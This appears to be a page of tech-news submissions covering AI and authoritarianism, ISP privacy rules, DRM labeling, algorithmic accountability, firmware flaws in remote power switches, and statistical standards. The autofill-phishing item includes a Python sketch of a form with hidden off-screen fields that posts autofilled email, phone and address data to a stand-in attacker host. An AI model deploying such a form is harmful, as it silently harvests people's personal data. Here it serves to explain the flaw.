
Submission + - SPAM: Artificial intelligence is ripe for abuse, tech researcher warns

randomErr writes: As artificial intelligence becomes more powerful, people need to make sure it’s not used by authoritarian regimes to centralize power and target certain populations, Microsoft Research’s Kate Crawford warned on Sunday. “Just as we are seeing a step function increase in the spread of AI, something else is happening: the rise of ultra-nationalism, rightwing authoritarianism and fascism,” she said. All of these movements have shared characteristics, including the desire to centralize power, track populations, demonize outsiders and claim authority and neutrality without being accountable. Machine intelligence can be a powerful part of the power playbook, she said.

Submission + - EFF needs your help to stop Congress dismantling Internet privacy protections!

Peter Eckersley writes: Last year the FCC passed rules forbidding ISPs (both mobile and landline) from using your personal data without your consent for purposes other than providing you Internet access. In other words, the rules prevent ISPs from turning your browsing history into a revenue stream to sell to marketers and advertisers. Unfortunately, members of Congress are scheming to dismantle those protections as early as this week. If they succeed, ISPs would be free to resume selling users' browsing histories, pre-loading phones with spyware, and generally doing all sorts of creepy things to your traffic.

The good news is, we can stop them. We especially need folks in the key states of Alaska, Colorado, Maine, Montana, Nevada, Ohio, and Pennsylvania to call their senators this week and tell them not to kill the FCC's Broadband Privacy Rules.

Together, we can stop Congress from undermining these crucial privacy protections.

Submission + - There Hasn't Been Ad-Blocker Coverage for Months, and That's Bad News

writes: Have you noticed that no relevant media outlet is talking about ad blockers anymore?

You probably haven't, and that's really what got me thinking. It's not like ads have all become "acceptable", not even close. And to my eyes, ads haven't decreased at all; if anything, they have increased, and so has the practice of detecting ad blockers and forcing visitors to disable them by making sites unusable otherwise.

How long until ad blockers fall into oblivion? At a time when the main sources of information depend financially (some even say desperately) on the non-proliferation of ad blocking, the first result for an "ad-block news" search on Google dates back to September 2016 (an article by The Verge), and nothing newer appears in the following ten results. Do note: this is a Google (ad-dependent) search ranking news outlet sites (also ad-dependent), so it's hard to discern who is at fault here, but I doubt ad blocking has become irrelevant as news material. Undesired sounds more likely.

But if that weren't enough of a sign, even Slashdot articles are neglecting the subject. A search for "adblock" stories turns up nothing newer than last August. Unless, of course, this one makes it to the top. If you already had to doubt most information about ad blockers, now that no information is circulating at all, can you really trust news from sources that discriminate with such a heavy bias?

Submission + - Browser Form Autofill Profiles Can Be Abused for Phishing Attacks

An anonymous reader writes: Browser autofill profiles are a reliable phishing vector: attackers can collect information from users via hidden form fields, which the browser automatically fills with preset personal information and which users unknowingly send to the attacker when they submit the form.

There's an online demo where you can test this behavior.

Browsers that support autofill profiles are Google Chrome, Safari, and Opera. Browsers like Edge, Vivaldi, and Firefox don't support this feature, but Mozilla is currently working on a similar feature.
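As a rough sketch of the technique described above (the field names, off-screen styling, and collection URL are all hypothetical, not taken from the demo), such a page shows the victim one innocuous field while quietly including others that an autofill profile will populate:

```python
# Sketch of a phishing form: one visible field, plus off-screen inputs
# that a browser autofill profile may populate and submit unnoticed.
VISIBLE_FIELD = '<input type="text" name="name" placeholder="Your name">'

# Hidden fields pushed far off-screen; autofill treats them like any
# other form field, so submitting sends their values to the attacker.
HIDDEN_FIELDS = [
    '<input type="email" name="email" style="position:absolute;left:-9999px">',
    '<input type="tel" name="phone" style="position:absolute;left:-9999px">',
    '<input type="text" name="address" style="position:absolute;left:-9999px">',
]

def build_form(action_url: str) -> str:
    """Assemble the full form markup posting to the attacker's endpoint."""
    fields = "\n  ".join([VISIBLE_FIELD] + HIDDEN_FIELDS)
    return (f'<form method="POST" action="{action_url}">\n'
            f'  {fields}\n  <button>Submit</button>\n</form>')

html = build_form("https://attacker.example/collect")
```

The victim believes they typed only a name, but the POST body also carries the email, phone, and address values the browser filled in.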

Submission + - Weapons of Math Destruction Author: Models are Opinions Embedded in Math

dangle writes: The LA Times has an interview with "Weapons of Math Destruction" author Cathy O'Neil discussing her concerns about the social consequences of ill-considered mathematical modeling. She discusses the example of a NYC Department of Education algorithm designed to grade school teachers that no one outside of the coders had access to. "The Department of Education did not know how to explain the scores that they were giving out to teachers," she observes. "...(T)he very teachers whose jobs are on the line don’t understand how they’re being evaluated. I think that’s a question of justice. Everyone should have the right to know how they’re being evaluated at their job," she argues. Another example discussed is a Los Angeles Department of Children and Family Services risk-modeling algorithm developed by SAS to score children according to their risk of being abused so that social workers can better target their efforts. Depending on the ethical considerations, such an algorithm could intentionally overweight factors such as income or ethnicity in a way that could tip the balance between right to privacy and protection of abused minors one way or another. "I want to separate the moral conversations from the implementation of the data model that formalizes those decisions. I want to see algorithms as formal versions of conversations that have already taken place," she concludes.
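O'Neil's point that "models are opinions embedded in math" can be made concrete with a toy example. The feature names, weights, and numbers below are entirely hypothetical, not drawn from any real system: two equally plausible-looking weight choices for the same scoring structure encode different policy opinions and rank the same family differently.

```python
# Toy risk score: the model structure is neutral, but the weights are
# a policy choice. All names and numbers here are made up.
def risk_score(features: dict, weights: dict) -> float:
    """Weighted sum of feature values; unweighted features count as zero."""
    return sum(weights.get(k, 0.0) * v for k, v in features.items())

family = {"prior_reports": 2, "household_income_low": 1, "missed_checkups": 3}

# Two defensible-looking weightings embedding different opinions:
weights_a = {"prior_reports": 3.0, "missed_checkups": 1.0}  # ignores income
weights_b = {"prior_reports": 3.0, "missed_checkups": 1.0,
             "household_income_low": 4.0}                   # income weighted heavily

print(risk_score(family, weights_a))  # 9.0
print(risk_score(family, weights_b))  # 13.0
```

Whether low income should count toward risk at all is exactly the kind of moral conversation O'Neil wants separated out before it gets frozen into the model.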

Submission + - What are the FLOSS community's answers to Siri and AI?

jernst writes: A decade ago, we in the free and open-source community could build our own versions of pretty much any proprietary software system out there, and we did. Publishing, collaboration, commerce, you name it. Some apps were worse, some were better than closed alternatives, but much of it was clearly good enough to use every day.

But is this still true? For example, voice control is clearly going to be a primary way we interact with our gadgets in the future. Speaking to an Amazon Echo-like device while sitting on my couch makes a lot more sense than using a web browser. Will we ever be able to do that without going through somebody’s proprietary silo like Amazon’s or Apple’s? Where are the free and/or open-source versions of Siri, Alexa and so forth?

The trouble, of course, is not so much the code as the training. The best speech recognition code isn't going to be competitive unless it has been trained on about as many millions of hours of example speech as the closed engines from Apple, Google and so forth have been. How can we do that?

The same problem exists with AI. There’s plenty of open-source AI code, but how good is it unless it gets training and retraining with gigantic data sets? We don’t have those in the FLOSS world, and even if we did, would we have the money to run gigantic graphics card farms 24×7? Will we ever see truly open AI that is not black-box machinery guarded closely by some overlord company, but something that “we can study how it works, change it so it does our computing as we wish” and all the other values embodied in the Free Software Definition?

Who has a plan, and where can I sign up?

Submission + - EFF Asks FTC To Demand 'Truth In Labeling' For DRM

An anonymous reader writes: Interesting move by Cory Doctorow and the EFF, who sent letters to the FTC making a strong case that DRM requires some "truth in labeling" details to make sure people know what they're buying. The argument is pretty straightforward (PDF): "The legal force behind DRM makes the issue of advance notice especially pressing. It’s bad enough when a product is designed to prevent its owner from engaging in lawful, legitimate, desirable conduct — but when the owner is legally prohibited from reconfiguring the product to enable that conduct, it’s vital that they be informed of this restriction before they make a purchase, so that they might make an informed decision. Though many companies sell products with DRM encumbrances, few provide notice of these encumbrances. Of those that do, fewer still enumerate the restrictions in plain, prominent language. Of the few who do so, none mention the ability of the manufacturer to change the rules of the game after the fact, by updating the DRM through non-negotiable updates that remove functionality that was present at the time of purchase." In a separate letter (PDF), the EFF, along with a number of other consumer interest groups as well as content creators like Baen Books, Humble Bundle and McSweeney's, suggests some ways that a labeling notice might work.

Submission + - Neuroscience Would Fail to Make Sense of a 1970s-Era Microprocessor, Says Paper

wherrera writes: According to a preprint entitled "Could a neuroscientist understand a microprocessor?" on the biology preprint archive, the same techniques used by the latest probes to inspect the function of the mammalian brain and its connectome fail spectacularly when used to probe a running simulation of the MOS 6502, the processor behind classic Atari-era video games such as Donkey Kong, Space Invaders, and Pitfall.

The investigators used probability analysis of correlations in signals, as well as techniques such as "lesion studies," in which a simulated transistor is destroyed to imitate the method researchers use to investigate the effects of a lesion on the nervous system. They conclude that reverse engineering the brain is unlikely to succeed until we have a better understanding of what the brain as a system is doing, since "we do not generally know how the output relates to the inputs" in the brain well enough to properly guide such investigations.


Submission + - Lights out: flaws in remote power management gear let hackers pull the plug

chicksdaddy writes: Passcode is reporting that researchers are warning that security vulnerabilities in widely used remote power management (RPM) equipment could give malicious hackers the ability to remotely shut off power to critical information systems and industrial machinery.

Researchers at Georgia-based BorderHawk said they discovered suspicious traffic emanating from compromised RPM devices while working at a large energy firm. An investigation found more reasons for concern: undocumented features, hidden in firmware and requiring no authentication, that could be used to dump a list of user accounts and passwords for accessing the device. Researchers also found a link to a malicious domain located in China buried in a help file.

RPMs are simple network hardware containing two power outlets for plugging in equipment, as well as Ethernet and serial ports for connecting to the network or directly to another computer.

The work by BorderHawk jibes with work done by the security consulting firm Senrio Inc. (formerly called Xipiter). Researchers there analyzed the NetBooter NP-02B, made by the Arizona firm SynAccess Networks, and found hidden, no-authentication features in that device's firmware. One lets anyone remotely reset the NetBooter to its factory default configuration. Another allows anyone to modify network and system settings. A third, hidden function could be used to extract data (like a recently entered password) stored in the device's memory, according to Stephen Ridley, a principal at Senrio. Searches using a public device search engine reveal hundreds of publicly accessible SynAccess RPM devices deployed at universities, on government networks, and at other businesses.

The problem is a byproduct of changes in the way that technology firms source and build their products, often relying on far-flung networks of manufacturers and suppliers who operate with little oversight or quality control.

"Hardware is a misunderstood, unknown territory," said noted electrical engineer and inventor Joe Grand of Grand Idea Studio. "People buy a piece of hardware and take it for granted. They assume it is secure. They assume it does what it does and only does what it does."

Submission + - Weak statistical standards implicated in scientific irreproducibility

ananyo writes: The plague of non-reproducibility in science may be mostly due to scientists’ use of weak statistical tests, as shown by an innovative method developed by statistician Valen Johnson, at Texas A&M University. Johnson found that a P value of 0.05 or less — commonly considered evidence in support of a hypothesis in many fields including social science — still meant that as many as 17–25% of such findings are probably false. He advocates for scientists to use more stringent P values of 0.005 or less to support their findings, and thinks that the use of the 0.05 standard might account for most of the problem of non-reproducibility in science — even more than other issues, such as biases and scientific misconduct.
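The arithmetic behind findings being "probably false" despite passing p < 0.05 follows from Bayes' rule. The sketch below uses illustrative assumptions (20% of tested hypotheses true, 80% statistical power), not numbers from Johnson's paper, to show how the fraction of false discoveries among significant results shrinks when the threshold drops from 0.05 to 0.005:

```python
# Fraction of "significant" findings that are false positives, given
# a prior fraction of true hypotheses and test power (Bayes' rule).
# The prior and power below are illustrative assumptions only.
def false_discovery_rate(alpha: float, power: float, prior_true: float) -> float:
    """P(hypothesis is false | test came out significant at level alpha)."""
    true_pos = power * prior_true          # true effects correctly detected
    false_pos = alpha * (1 - prior_true)   # null effects wrongly flagged
    return false_pos / (true_pos + false_pos)

# With 20% of tested hypotheses true and 80% power:
print(round(false_discovery_rate(0.05, 0.8, 0.2), 3))   # 0.2
print(round(false_discovery_rate(0.005, 0.8, 0.2), 3))  # 0.024
```

Under these assumptions roughly one in five significant results at alpha = 0.05 is false, in the same ballpark as the 17 to 25% range Johnson reports, while the stricter 0.005 threshold cuts that to about 2%.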
